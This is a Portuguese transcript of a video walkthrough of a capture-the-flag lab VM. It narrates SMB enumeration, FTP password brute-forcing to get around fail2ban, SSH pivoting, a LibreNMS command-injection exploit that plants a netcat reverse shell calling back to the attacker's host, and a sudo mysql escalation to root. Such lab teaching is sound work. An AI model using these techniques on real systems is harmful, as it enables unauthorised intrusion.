Fala pessoal, beleza? A gente vai começar a nossa 15ª máquina, a Symfony 2. Essa máquina foi bem divertida, como o próprio autor aqui diz que ela é uma máquina intermediária, né, que é Real Life Based aqui, então é bem parecida com as máquinas aí da SCP. Para quem está estudando para o SCP, essa máquina é bem legal. A gente não vai utilizar a Metasploit para fazer a exploração dela, tá? A gente vai fazer manualmente também. E essa máquina é legal que a gente tem que fazer um pivoting para rodar um serviço que está rodando somente para localhost, né, para poder explorar ele. E a gente vai fazer o pivot então usando SSH, né? Não vai utilizar o Metasploit dessa vez para fazer o pivoting. E a primeira exploração dessa máquina, né? A gente vai montar aí um SMB, como a gente já fez anteriormente, né? Tem um usuário anônimo. A gente vai conseguir um arquivo de backup aí que a gente consegue fazer o recon do primeiro usuário. Essa máquina ela tem um SSH e se a gente tentar fazer o ataque de password no SSH, a gente vai tomar um bloco e ele vai fechar a porta pra gente do SSH, porque tem um cara chamado Fail to Ban lá no SSH. Então eu deixei aqui para vocês verem como funciona o Fail to Ban. Default aqui, ó, ele dá um ban por 600 segundos, que é como tá lá na máquina. E tem o default aqui, depois de 3 tentativas erradas, ele dá um ban. Então, esse é um mecanismo de proteção aí do SSH para impedir que a gente faça um ataque de password lá no SSH, mas a gente vai fazer de outras formas aqui para conseguir a credencial do usuário e se conectar via SSH para tentar, né, se movimentar aí no ambiente. Então, depois que a gente fizer essa conexão via SSH com esse usuário que a gente vai comprometer, a gente vai perceber aí, né, dentro da máquina que existe um serviço local rodando somente para tem um serviço rodando na porta 8080, né, somente para localhost. E esse serviço ele é um LibreNMS. Esse cara aqui, ele é uma ferramenta de monitoramento igual o Zabbix, igual o Nagios, né? Ele faz o monitoramento de ativos aí recebendo por SNMP ou outros protocolos, né, as informações do ambiente monitorado e mostra isso num dashboard. Então a gente vai explorar uma falha de RCE nesse cara. Ele tem uma falha aqui que dentro de um parâmetro não tem uma sanitização correta lá e a gente vai conseguir fazer a exploração. Então daqui a pouco eu volto aqui para mostrar mais para vocês sobre esse exploit. Vamos seguir para a nossa primeira parte aqui da exploração. Então primeiro a gente já pegou o IP aqui do cara, né? Dá um sudo nmap "-szinho vzão "-v 192.68.2.33", que é o IP que ele pegou aqui na minha infra. Então a gente já consegue ver aqui que tem algumas portas abertas, como a 445 aqui, ó, a gente já deduz então que tem um Samba rodando lá, né? Porque essa máquina a gente sabe que é Linux, então se fosse o Windows, né, poderia ser um SMB lá no Windows, mas a gente já sabe que é Linux, então a gente sabe que é um Samba, ó. Um Samba na versão 3x está rodando lá, né? Na porta 80 tem um browser rodando. Não tem nada nesse cara, não adianta, a gente não vai varrer ele aqui para não perder tempo, mas a exploração dessa máquina não vai ser via esse cara aqui. Tem um OpenSSH 7.4 rodando aqui e um ProFTPD 135, né, lá dentro do server. Então, ao invés da gente tentar explorar esse ProFTPD aí, né, primeiro vamos fazer uma enumeração da 445 aqui e ver o que a gente consegue encontrar. Então, se a gente utilizar o enum for Linux, como a gente já usou antes, né, o 92.168.2.33, a gente já consegue trazer algumas informações aqui. Antes mesmo dele acabar ali, a gente já viu que ele encontrou um domínio aqui, né? E que tem um compartilhamento anônimo aqui, ó, que chama Anonymous, que ele conseguiu mapear e conseguiu listar, então não tem senha, né? O acesso é Anonymous. Então a gente pode montar esse cara para ver o que tem lá dentro. Então a gente pode usar esse MB Client, né, como a gente já utilizou antes. 4 barras aqui, 192.168.2.33, que é o IP lá, mais 2 barras para passar o share que a gente vai montar, né, que é Anonymous o nome.
Então a senha a gente pode deixar em branco mesmo, ele vai conseguir montar aqui porque tá liberado, né, o acesso para o usuário anônimo. Então se a gente navegar nele aqui, né, tem um diretório de backup aqui, ó. É bem comum na vida real você encontrar, né, caminhos que você possa montar na rede, né, com informações sensíveis. Então se a gente der um get nesse log.txt aqui, a gente baixou ele aqui para nossa máquina. Se a gente for ler ele aqui, ele tem algumas informações, né, de configuração aí dentro da máquina, um backup aí de arquivos de configuração. Então aqui nesses arquivos de configuração sempre tem informações importantes, né? Aqui em cima, no começo, ó, deixa eu ver aqui onde, tem um lugar aqui que ele mostra alguns usuários. É um arquivo de várias configurações, né, de vários serviços. Então se você ler com calma esse arquivo aqui, você vai ver que ele tem algumas informações, como por exemplo aqui, ó, está mostrando que existe um usuário chamado Aeolus e o grupo Aeolus. Então a gente pode começar a fazer a nossa enumeração com esse usuário aqui. Então já que a gente pegou o usuário Aeolus aqui, a gente poderia tentar conectar nele no SSH. Se a gente rodar um Hydra direto no SSH, você vai ver que se você executar, na mesma hora já vai bloquear o acesso do SSH porque tem um fail to ban lá. Então o que a gente pode fazer? Para bypassar isso aí, a gente pode fazer esse mesmo o ataque com o Hydra no FTP. Eu não vou fazer aqui para não demorar no vídeo, né? Mas eu utilizei a RockU aqui e deu certo. Na vida real, claro que você não vai usar a RockU, né? Mas eu passei aqui o Hydra-L, né, de usuário Aeolus e o "-p" maiúsculo para passar o word list. Então passei a word list do RockU. Só que em vez de fazer no SSH o ataque de password, a gente fez no FTP e a gente conseguiu pegar aqui então que a senha do Aeolus é Sérgio Te Amo. Então agora que a gente tem a credencial, né, o próximo passo que a gente pode fazer aí nessa máquina, né, seria se conectar então via SSH na máquina. SSH Aeolus, que é o usuário, certinho aqui como é que escreve, Aeolus. Arroba 192.68.2.33 e a senha dele é Sérgio Te Amo. Então a gente conseguiu se logar aqui, né, no usuário Aeolus. Então já foi o primeiro passo aí. Agora para você fazer as movimentações aqui dentro, né, você pode rodar algumas ferramentas aqui para ver algumas informações dentro. Por exemplo, o linha num, eu sempre falo dele, a gente nunca utilizou. Eu vou mostrar para vocês aqui como é que a gente pode utilizar. Se você vier aqui no browser, deixa eu achar aqui o linha num. O linha num ele é um script SSH, né? Deixa eu dar um RAW aqui para a gente poder copiar ele. É, ele faz um monte de coisa, tá? É um monte de requisição lá no server, então faz um barulhão, tá? Vocês podem rodar aí para ver como funciona, mas na vida real não é legal você sair executando linha num assim, porque ele executa um monte de coisa dentro do server, tá? É legal vocês entenderem o que o script faz aqui e ver qual que é a ideia, né, do desenvolvedor aqui, do que ele está buscando para trazer essas informações. Mas eu vou rodar aqui para mostrar para vocês. A gente pode abrir aqui um novo terminal, deixa eu deixar maior aqui. Eu vou criar um arquivo aqui, eu vou chamar de A mesmo esse arquivo. E aqui nesse arquivo eu vou inserir então esse script aqui do linha num. Deixa ele rodar aqui. Tá vendo o tamanho do script? Ele roda um monte de coisa, né? Tem que ficar esperto em rodar essas coisas no alvo, que às vezes tem um monitoramento lá de lá e você é pego só por conta do barulhão que você está fazendo, rodando um monte de coisa no alvo aí, né? Tem que ser mais stealth. Mas aqui como é CTF, só para vocês verem aí o funcionamento e onde a gente vai conseguir ver mais informações aqui, né? Deixa eu terminar aqui. Tá faltando memória aqui na VM. Se tivesse mais memória, já tinha copiado tudo.
Beleza, pode salvar esse cara aqui. Então agora a gente vai subir um simple server aqui, python "-m simple http server" na porta 8080. E aqui no Aeolus, né, onde a gente já conectou, a gente pode dar um CURL "-s" de silent http 192.168.2.5, que é o IP do Kali, na porta 8080, /a, que é o nome do arquivo que a gente criou ali. Então a gente pode mandar aqui um menos O maiúsculo menos pipe bash. Opa, acho que é sem o pipe bash. Não, peraí. Vamos fazer com wget que é mais fácil. Tira esse menos O maiúsculo aqui, tira esse menos S, wget. Não rolou também. Isso aqui é porque eu estou no SSH aqui? Mas não, peraí. Eu misturei os comandos, não tem esse menos O aqui, ó, só o bash. Beleza, então o que ele fez? Ele deu um seu URL lá no nosso simple server aqui, né? E a saída ele já executou direto no bash o que a gente passou como parâmetro ali, né? Então ele já está rodando linha num aqui, pode ver que ele traz um monte de informação aí sobre a máquina, né? Então aqui você consegue ver serviço rodando, quais são os usuários, tudo que tem de informação aí, né? Deixa eu vir no começo aqui. Quem está logado aqui na máquina, né? Já pegou aqui o etc/pswd, né? O Shadow também. Olha, tá dizendo que está permitido fazer o login com o usuário root via SSH. Tem algumas informações aqui de ambiente. Ó, você consegue ver um monte de coisa aí sobre a máquina, né? Assim que você vai começar a fazer as numerações aí para fazer a tua pós-exploração. Então, aqui, ó, uma coisa que a gente já conseguiu ver aqui no Listen TCP, né? Ele deu um, deu um netstat para ver quais são as portas abertas aqui na máquina, né? E a gente consegue ver aqui, ó, que em localhost está rodando a porta 8080. Então tem alguma aplicação rodando aqui na 8080. Se a gente tentar abrir isso aqui pelo nosso browser, né, direto, sem fazer um pivoting aqui, a gente não vai conseguir acessar. Ó, quer ver? Ó, 192.168.2.33 na porta 8080. Ó, ele não tem nada lá, né? Tá dando refused. Então, como é que a gente faz para conseguir abrir esse cara, né? A gente pode fazer um pivoting que vai fazer um redirecionamento da porta 8080, né? Ou a porta que a gente escolher aqui dentro da nossa máquina para esse cara aqui. Como é que a gente faz isso, né? Aqui nos links que eu estou deixando para vocês tem uma explicação aqui de como se faz um pivoting utilizando o SSH. Então ele até explica aqui o motivo, né, de se fazer um pivoting, que é exatamente isso que a gente precisa agora, quando você tem que acessar uma porta local numa máquina ou então se movimentar para dentro, né, da rede, você vai fazer o pivoting. Então utilizando o SSH aqui, você passa o parâmetro "-l" maiúsculo e uma porta local, que é a porta que você vai utilizar na sua máquina para fazer esse pivoting. Vai passar o endereço IP local, né, você pode passar localhost, né, ou 127.0.0.1, e uma porta remota, que é a porta que ele vai fazer o tunelamento lá para dentro do alvo. Então você faz a conexão via SSH. Então já que a gente pegou aqui a ideia de como faz, né? A gente pode dar aqui então um SSH "-l" maiúsculo e aqui na nossa porta eu vou passar outra porta e não a 8080, porque a 8080 eu uso para o burp. E a gente vai precisar do burp daqui a pouco, então se eu usar a 8080 o burp não vai funcionar ou eu vou ter que trocar a porta do burp. Então eu vou colocar outra porta aqui, pode ser a 8081, por exemplo. Então eu passo dois pontos aqui, né, em localhost, que é o meu endereço, e a porta 8080 que é a que a gente vai tunelar lá para dentro
do alvo. Então a gente passa o usuário aqui, né? Aeolus arroba 192.68.2.33 e a senha é Sérgio, te amo. Então ele conectou aqui no SSH. Enquanto ele estiver conectado, a gente consegue tunelar o acesso por aquela porta. Então voltando aqui agora onde a gente teve o Refused aqui, se a gente bater aqui 8081, que foi o tunelamento que a gente fez, a gente vai conseguir acessar esse cara. Peraí, por algum motivo não rolou. Ah, claro que não vai rolar, porque a gente está tentando bater direto lá no alvo. E a gente vai ter que trocar então para localhost na 8081. Assim a gente vai conseguir o acesso, né, da porta lá rodando lá no cara, porque quando ele bater localhost, o tunelamento que a gente fez vai fazer de localhost pela porta 8081 ele passar para a porta 8080 lá dentro do alvo. Então aqui a gente consegue, né, se logar aqui, ó, Aeolus com a senha Sérgio, te amo. E assim a gente vai ver que a gente conseguiu, né, chegar aí dentro da aplicação. Então a gente já consegue começar a fazer aí a brincadeira. Então se você vier aqui no Kali e der um search exploit aqui, opa, travou tudo meu Kali aqui, que legal. Deixa eu fechar aqui. Então aqui dentro do Kali a gente pode dar um search exploit, né, e passar o nome aqui do Libre NMS, para a gente encontrar aqui alguma possível vulnerabilidade, né? Esse cara aqui, ó, ele tem uma possível falha aqui de Remote Code Execution. Então vamos copiar esse exploit para cá, para a gente poder dar uma analisada nele. Search exploit "-m", para jogar aqui para o nosso diretório, né? Opa, eu já tinha copiado ele aqui antes. Deixa eu só apagar que eu já tinha feito umas alterações nele. Aí. Então ele copiou aqui o 47044, né? Então vamos abrir ele aqui para a gente entender o que esse exploit vai fazer. Então eu vou abrir aqui no browser, que é o mesmo exploit, só para ficar mais fácil da gente poder ver aqui no vídeo, tá? Você poderia continuar vendo ali mesmo, mas é só para mostrar para vocês aqui que fica mais fácil. Então a falha aqui, o nome, né, do exploit é a Add Host Remote Code Execution. Então ainda antes da gente analisar a vulnerabilidade, só de olhar o que o script faz aqui, ele está fazendo uma requisição lá no site, né? Então ele pega aqui como parâmetro target o cookie da sessão, então ele já demonstra que precisa estar autenticado para conseguir executar, né, o exploit do lado de lá. Passa o rhost, que no caso é o host onde ele vai se conectar, né, que seria o lhost na verdade. Então é o IP do nosso Kali, né, a porta que a gente vai abrir no nosso Kali. Ele passa um nome aqui para o hostname que ele vai salvar lá dentro da aplicação, e o payload ele está usando aqui um netcat reverso, né, usando o mkfifo. Então aqui no header ele está passando, né, o user agent, né, o content type, e dá para ver aqui que ele também envia os cookies na request. Então precisa estar autenticado que ele vai usar uma requisição que já está autenticada para fazer essa requisição. Então analisando por cima aqui o que tem dentro, né, da requisição aqui no how request, ó, que é o código que vai ser enviado na requisição, ele está passando aqui o hostname, ele está inserindo o payload no community aqui, ó, no campo community. Então a gente deduz que esse campo community ele seja vulnerável, né, ao RCE aqui. O cara tá inserindo aquele mkfifo ali que faz o netcat reverso dentro do campo de payload aqui. Então aí no final ele faz aqui o request e ele faz o request para inserir lá esse cara dentro da aplicação. Depois ele faz mais um request aqui, faz um request aqui nesse Ajax aqui, ó, passando alguns parâmetros aqui. Então, para a gente poder entender o que é essa vulnerabilidade, né, para não sair rodando sem entender, tá aqui na descrição tem um link que explica mais sobre a CVE. Se você pegar a CVE para ler aqui,
você vai entender que a falha é uma falha de sanitização dentro desse parâmetro que a gente viu aqui que ele faz a injeção, que é o parâmetro community. Então a falha é uma falha de injeção dentro do ADHost inc.php aqui, ó. Então se você procurar mais sobre esse exploit, né, esse link está na descrição aí para vocês também. É bem legal que aqui ele mostra até quais são as funções dentro lá do PHP que tem a vulnerabilidade, né, dentro da aplicação que permite você fazer a inserção do comando. Então, basicamente, aqui dentro do LibreNMS que tá rodando lá na máquina, que a gente conseguiu logar aqui nele, né? Aqui nos devices, ó, a gente consegue adicionar um device. Então, no momento de adicionar esse device, o parâmetro community aqui, ó, ele é um parâmetro que não está sendo sanitizado lá dentro do back-end. O que que é sanitização, né? É você, dentro do código, identificar se tem algum comando arbitrário além ou algum caractere que não seja esperado, né? Então, tipo, por exemplo, quando você passa uma aspa simples, você pode concatenar uma string ali para poder fazer uma SQL injection. Uma sanitização vai ser uma classe ali, tipo um prepare statement, por exemplo, uma classe que vai fazer com que uma função que seja, que vai fazer com que aquela requisição não seja inserida direto no banco sem ser sanitizada antes, né? Então, nesse caso aqui, ele executa um comando lá dentro do servidor e esse comando não é sanitizado. Então aqui no community, a hora que você insere o RCE aqui, ele vai fazer então executar o comando arbitrário lá dentro do server, né? Então tá descrito bem certinho aqui dentro tá descrito bem certinho aqui então dentro desse paper aqui, né, que mostra sobre a falha. Então assim que a gente conseguiu descobrir isso, né, aqui dentro do exploit, a gente viu que uma das coisas que ele precisa para executar é o cookie, né, da sessão. Então a gente precisa primeiro abrir a sessão para conseguir pegar o cookie e para conseguir fazer essa requisição aqui por dentro do exploit. Então como é que a gente vai fazer isso, né? Primeiro passo a gente já fez, que foi fazer o pivoting para conseguir chegar na aplicação. Então aqui dentro do Burp, ó, a gente pode abrir o browser, né? A gente fez a gente fez o nosso pivoting sem utilizar a porta 8080, porque a gente ia usar aqui no Burp, né, a porta 8080 para fazer as nossas requests. Então, se a gente abrir a aplicação aqui, a 192.68.2.33, opa, tá fazendo, a gente já fez o pivoting, é localhost na porta 8080, opa, 8081. 8080 é lá, né? 8081 é a que a gente abriu aqui. Então a gente pode fazer a nossa conexão aqui, né? O usuário Aeolus. Opa. Usuário Aeolus e a senha Sérgio Te Amo. Beleza, a gente fez aqui o login, né? Então, para a gente conseguir o cookie da sessão, precisa estar logado. Então, a gente pode dar um intercept on aqui e navegar aqui, né, de novo na aplicação, tentar abrir alguma coisa aqui, que a gente vai conseguir, ó, pegar o cookie da sessão aqui, ó. Então, você pode copiar o cookie inteiro, né, desde do PHP SES-ID aqui, ó, até a parte final. Se você analisar aqui no exploit, você vai ver que aqui no final, antes de fazer a última requisição, ele trata o cookie, né, ele faz um split aqui, deixa eu ver onde é que está aqui. Ele faz um split do cookie para conseguir fazer a requisição. Então você precisa passar o cookie inteiro. É aqui, ó. Ele faz tem uma funçãozinha aqui que vai fazer o tratamento desse cookie para ficar no formato que ele consegue fazer a request aqui embaixo. Então você pode copiar o cookie inteiro mesmo, que ele faz o split aqui no ponto e vírgula e depois onde tem o símbolo de igual, né? Então do jeito que está o cookie aí, você pode jogar ele aqui na requisição. Então se a gente voltar aqui no nosso Kali, para rodar o nosso exploit aqui, ele pega tudo como argumento. Então, o primeiro argumento que ele pega é o target, né, o alvo. O segundo argumento é o cookie. O terceiro argumento é o host remoto onde ele vai se conectar e depois a porta, né? E o hostname aqui, ó, é o nome do device que ele vai salvar lá
dentro da aplicação. Eu vou alterar só porque eu já fiz uma inserção lá, eu vou chamar de batata frita. Pode chamar como você quiser, mas esse aqui é o nome que ele vai criar um host novo lá. Então lembra que como que é a execução desse exploit, né? A falha está onde? Aqui dentro da aplicação, quando você vai adicionar um host, né? Aqui dentro do parâmetro community, a gente vai fazer o RCE. Então esse script ele nada mais faz do que uma requisição aqui dentro do LibreNMS, insere um host novo, insere o payload de netcat reverso dentro do parâmetro community aqui e depois faz uma requisição Ajax, né, solicitando solicitando aqui o acesso, né, desse cara. Então ele faz uma requisição perguntando o status, né, daquele host que a gente criou ali e a hora que ele solicita esse status, ele abre a sessão aqui com a gente. Então a gente pode chamar aqui, né, o Python. Opa, deixa eu ver qual foi o nome que eu salvei o script aqui. Python 47044.py. O primeiro parâmetro que a gente viu lá no script que ele pede é o host, né? Então é http localhost na porta 8080, 8081. Por que localhost, né? Porque a gente fez o pivot, então a gente vai fazer essa requisição entrar em localhost 8081 e essa 8081 vai fazer o tunelamento para 8080 lá dentro do alvo, né? Depois a gente passa o cookie. Então, para passar esse cookie, a gente precisa abrir aspas para jogar ele aqui, porque ele tem uns ponto e vírgula aqui, e o ponto e vírgula no Linux ele vai finalizar o comando, né? Vai quebrar a linha e aí vai dar erro. Então, precisa passar aspas para poder dar certo. Então, depois a gente vai passar aqui o nosso handler, né? Que é o IP do Kali, 192.168.2.5, né? Na porta 443, como sempre. Só antes da gente executar esse cara aqui, porque na hora que a gente executar ele já vai já vai abrir a sessão. A gente vai abrir nosso handler aqui embaixo, sudo nc-nlvp para escutar em modo verboso na porta 443. Então assim que a gente executar, ele provavelmente vai abrir a sessão. Ó, aqui a gente conseguiu abrir a sessão. Então o que ele fez? Primeiro ele fez a inserção, né, do batata frita. Então se a gente vier aqui agora nos devices, ó, delete device, ele vai aparecer aqui, ó, o batata frita, que foi o device que a gente criou. Então o que ele faz? Como ele criou esse device batata frita aqui, né, ele veio aqui, deu um add device, né, inseriu aqui o nome do hostname e aqui embaixo no community ele concatenou com aquela shell, né, de netcat reverso. Depois ele fez a requisição dentro desse último arquivo aqui, ó, do Ajax output.php, e para essa requisição Ajax ele passou esses parâmetros aqui, né, o header, o cookie, né, e a request. Na request ele pediu informações sobre esse host que ele criou aqui, que foi o dumb device, no nosso caso ele criou o batata frita. Então, a hora que ele solicitou informações sobre o batata frita, a hora que o sistema foi ler informações sobre o batata frita aqui dentro do dashboard, ele leu a nossa shell, né, e executou o RCE, e a gente abriu aqui a nossa sessão. Então, beleza, a gente já começou aí a seguir para o nosso caminho de conseguir um outro usuário aqui, né? Porque ó, agora a gente está com o usuário Cronos, não está mais com o usuário Aeolus, que não tem permissão de nada lá dentro da máquina. Então, vamos só spawnar uma shell aqui, python-c import pty.spawn /bin/bash. Beleza, a gente spawnou a shell aqui, agora a gente já consegue fazer algumas buscas aqui, né? Então, se a gente der um sudo "-l", a gente vai ver aqui que esse usuário ele tem permissão para executar como root, sem senha, o MySQL. Então, se a gente chamar o MySQL como root, né, e a gente conseguir uma shell dentro do MySQL, a gente vai conseguir, então, um acesso administrativo na máquina. A gente já fez isso em máquinas anteriores aqui, de explorar o MySQL. Nesse caso, a gente não vai nem precisar inserir uma lib, porque ele já vai chamar com o root o MySQL. Então, se você der um sudo /usr /bin/mysql, ele abriu o MySQL sem senha nenhuma, porque ele já tinha uma permissão de abrir com no password aqui, né, sem senha. Então aqui no MySQL agora, se a gente der uma barra invertida exclamação sh, como a gente já viu anteriormente, a gente conseguiu uma shell, e essa shell está como root, ó. Então se a gente for agora no /root aqui, a gente consegue ler o proof aqui, ó, catproof.txt.
Então a gente precisou fazer todo esse rolê aí de fazer o pivoting, né, para conseguir é, explorar essa aplicação que estava rodando como 8080 somente para localhost. E na exploração dela a gente conseguiu um usuário que tinha permissão para escrever, para abrir o MySQL como root. Então a gente chamando o MySQL como root, chamamos o bash aqui e a gente conseguiu então a nossa shell interativa aqui com o usuário root, beleza? Espero que vocês estejam gostando dos vídeos aí. Se inscrevam no canal quem não está inscrito, tá? Lembrando que quem não tiver inscrito no canal não vai receber o certificado no final, tá? Mandem dúvidas lá no grupo se vocês tiverem. Aqui na descrição tá os links de apoio para essa máquina que a gente fez e também está disponível o link de download para a máquina de amanhã. Beleza, pessoal? Espero vocês amanhã e até mais. Falou!